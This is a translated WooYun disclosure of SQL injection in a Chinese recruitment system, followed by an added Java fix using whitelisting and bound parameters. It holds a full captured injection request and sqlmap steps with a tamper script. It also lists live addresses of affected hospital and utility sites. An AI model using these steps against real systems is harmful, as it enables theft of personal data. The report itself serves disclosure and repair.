
Vulnerability summary

Defect ID: wooyun-2015-0104170

Title: Four generic SQL injection vulnerabilities in a talent recruitment management system, reported together

Vendor: 鼎讯同创

Author: bitcoin

Submitted: 2015-03-30 12:34

Fixed: 2015-07-02 14:36

Published: 2015-07-02 14:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-30: Details reported to the vendor, awaiting vendor response
2015-04-03: Vendor confirmed; details disclosed to the vendor only
2015-04-06: Details opened to third-party security partners
2015-05-28: Details disclosed to core white hats and experts in the relevant fields
2015-06-07: Details disclosed to regular white hats
2015-06-17: Details disclosed to intern white hats
2015-07-02: Details disclosed to the public

Brief description:

Four injection points.

Detailed description:

The 鼎讯 talent recruitment management system is a product of Beijing Dingxun Tongchuang Technology Co., Ltd. (北京鼎讯同创技术有限公司).
The four injection points are all in the recruitment search form: the organization name, major, education level and position fields.
Peking University First Hospital is used for the demonstration:
http://123.124.148.248:8888/dap/dtalent/drs/default/commonPage.jsp?innercode=007
Search for 111111.

[Screenshot: 1.jpg]


Request captured with Burp:

POST /dap/dframe/ext.AJAX.f?__ajax=true HTTP/1.1
Host: 123.124.148.248:8888
Proxy-Connection: keep-alive
Content-Length: 1235
Pragma: no-cache
Origin: http://123.124.148.248:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://123.124.148.248:8888/dap/dtalent/drs/default/vacancy_list.jsp?channel=3&innercode=001
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=1902471DA6316729384C2CD0B6A9C025
_rt=loadData&_fid=net.dxtek.dtalent.drs.bs.VacancyList~net.dxtek.dtalent.drs.bs.VacancyListFramelet&_xml=%3Crpc%20id%3D%22dsVacancy%22%20type%3D%22wrapper%22%20objectclazz%3D%22undefined%22%20pi%3D%221%22%20ps%3D%2230%22%20pc%3D%221%22%20prc%3D%220%22%20fs%3D%22pk_vacancy%2Cpk_corp%2Cpk_dept%2Cpublishdate%2Cunitname%2Cdeptname%2Cedureq%2Cedureq_showname%2Cgenderreq%2Cgenderreq_showname%2Crequirecount%2Cworkplace%2Cishot%2Creleasedate%2Cmajorreq%2Cmajornamereq%2Cjob_name%2Cchannel%2Cpk_choose%2Cinnercode%2Cdept_innercode%2Cposition_innercode%2Cmajorreq_showname%2Cid%22%3E%3Cps%3E%3Cp%20name%3D%22channel%22%3E3%3C/p%3E%3Cp%20name%3D%22__fieldValue_0%22%3E001%2525%3C/p%3E%3Cp%20name%3D%22__fieldValue_1%22%3E%2525002%2525%3C/p%3E%3Cp%20name%3D%22__fieldValue_2%22%3E010%3C/p%3E%3Cp%20name%3D%22__fieldValue_3%22%3E%2525111111%2525%3C/p%3E%3Cp%20name%3D%22__whereSql%22%3Edp_organization.innercode%2520like%2520%253A__fieldValue_0%2520and%2520dt_vacancy.majorreq%2520like%2520%253A__fieldValue_1%2520and%2520dt_vacancy.edureq%2520%253D%2520%253A__fieldValue_2%2520and%2520dt_vacancy.job_name%2520like%2520%253A__fieldValue_3%3C/p%3E%3C/ps%3E%3Cvps%3E%3Cp%20name%3D%22isUseRauthCode%22%3E1%3C/p%3E%3C/vps%3E%3C/rpc%3E&1427426959721


URL-decoding the POST body gives:

_rt=loadData&_fid=net.dxtek.dtalent.drs.bs.VacancyList~net.dxtek.dtalent.drs.bs.VacancyListFramelet&_xml=<rpc id="dsVacancy" type="wrapper" objectclazz="undefined" pi="1" ps="30" pc="1" prc="0" fs="pk_vacancy,pk_corp,pk_dept,publishdate,unitname,deptname,edureq,edureq_showname,genderreq,genderreq_showname,requirecount,workplace,ishot,releasedate,majorreq,majornamereq,job_name,channel,pk_choose,innercode,dept_innercode,position_innercode,majorreq_showname,id"><ps><p name="channel">3</p><p name="__fieldValue_0">001%</p><p name="__fieldValue_1">%002%</p><p name="__fieldValue_2">010</p><p name="__fieldValue_3">%111111%</p><p name="__whereSql">dp_organization.innercode like :__fieldValue_0* and dt_vacancy.majorreq like :__fieldValue_1 and dt_vacancy.edureq = :__fieldValue_2 and dt_vacancy.job_name like :__fieldValue_3</p></ps><vps><p name="isUseRauthCode">1</p></vps></rpc>&1427426959721


It can be seen that the unfiltered parameters are dp_organization.innercode, dt_vacancy.majorreq, dt_vacancy.job_name and dt_vacancy.edureq.
The data is then dumped with sqlmap.
For example, to test dp_organization.innercode, mark the injection point with an asterisk in the encoded body:
dp_organization.innercode%2520like%2520%253A__fieldValue_0*%2520
Since the comparison uses like, the --tamper equaltolike.py script is also required.

[Screenshot: can1.jpg]

[Screenshot: can2.jpg]


Further cases:
Beijing Gas Group
http://114.242.137.125/dap/dtalent/drs/default/commonPage.jsp?innercode=007

[Screenshot: 114.jpg]

[Screenshot: 1141.jpg]

Poten Environment
http://211.103.167.51/dtalent/dtalent/drs/default/multi_detail.jsp?channel=4&pk_vacancy=11405161444332860366&innercode=002
Xuanwu Hospital, Capital Medical University
http://hr.xwhosp.com.cn/dtalent/dtalent/drs/default/multi_detail.jsp?channel=4&pk_vacancy=11411041305095210870&innercode=001
Beijing Chaoyang Hospital
http://zhaopin.bjcyh.com/dap/dtalent/drs/default/multi_detail.jsp?channel=3&pk_vacancy=11411191153554950578&innercode=001

Proof of vulnerability:

As above.

Fix recommendation:

Filter the input.
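The decoded request shows the actual root cause: the client sends the WHERE clause itself in __whereSql, and the server only binds the named values into it. The following is an added example of the fix the report asks for, written for this page and not taken from the product: the server keeps a whitelist of the four search fields seen in the capture, builds the clause itself, escapes LIKE wildcards and binds the values through a PreparedStatement. The class and key names and the selectFrom text are assumptions; the column names come from the captured request.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.*;

/** Server-side builder for the vacancy-search WHERE clause; the client may only send field values. */
public final class VacancyFilterBuilder {
    enum Op { EQ, LIKE_PREFIX, LIKE_CONTAINS }

    static final class Field {
        final String column; final Op op;
        Field(String column, Op op) { this.column = column; this.op = op; }
    }

    // Whitelist: accepted request key -> column and operator chosen by the server (insertion order kept).
    // Request keys are hypothetical; the columns are the ones in the captured __whereSql.
    private static final Map<String, Field> FIELDS = new LinkedHashMap<>();
    static {
        FIELDS.put("innercode", new Field("dp_organization.innercode", Op.LIKE_PREFIX));
        FIELDS.put("majorreq",  new Field("dt_vacancy.majorreq",      Op.LIKE_CONTAINS));
        FIELDS.put("edureq",    new Field("dt_vacancy.edureq",        Op.EQ));
        FIELDS.put("job_name",  new Field("dt_vacancy.job_name",      Op.LIKE_CONTAINS));
    }

    /** Escape LIKE metacharacters so a bound value matches literally ('!' is declared as the escape char). */
    static String escapeLike(String s) {
        return s.replace("!", "!!").replace("%", "!%").replace("_", "!_");
    }

    /** Returns the WHERE text with '?' placeholders plus the values to bind; any unknown key is rejected. */
    public static Map.Entry<String, List<String>> build(Map<String, String> request) {
        for (String key : request.keySet()) {          // a client-supplied "__whereSql" is refused here
            if (!FIELDS.containsKey(key)) throw new IllegalArgumentException("unknown filter: " + key);
        }
        List<String> clauses = new ArrayList<>(), params = new ArrayList<>();
        for (Map.Entry<String, Field> e : FIELDS.entrySet()) {
            String value = request.get(e.getKey());
            if (value == null || value.isEmpty()) continue;
            Field f = e.getValue();
            if (f.op == Op.EQ) { clauses.add(f.column + " = ?"); params.add(value); continue; }
            clauses.add(f.column + " like ? escape '!'");   // wildcards are added by the server only
            params.add(f.op == Op.LIKE_PREFIX ? escapeLike(value) + "%" : "%" + escapeLike(value) + "%");
        }
        return new AbstractMap.SimpleEntry<>(clauses.isEmpty() ? "1=1" : String.join(" and ", clauses), params);
    }

    /** Binds the values; selectFrom is a server-side constant, so no client text reaches the SQL string. */
    public static PreparedStatement prepare(Connection conn, String selectFrom, Map<String, String> request)
            throws SQLException {
        Map.Entry<String, List<String>> q = build(request);
        PreparedStatement ps = conn.prepareStatement(selectFrom + " where " + q.getKey());
        for (int i = 0; i < q.getValue().size(); i++) ps.setString(i + 1, q.getValue().get(i));
        return ps;
    }
}
```

With this shape, a request carrying extra keys or SQL fragments fails closed with an exception, which is also a useful signal to log and alert on.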

Copyright notice: please credit the source when reposting: bitcoin@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2015-04-03 14:35

Vendor reply:

A similar vulnerability has already been reported to the vendor; it will not be reported again.

Latest status:

None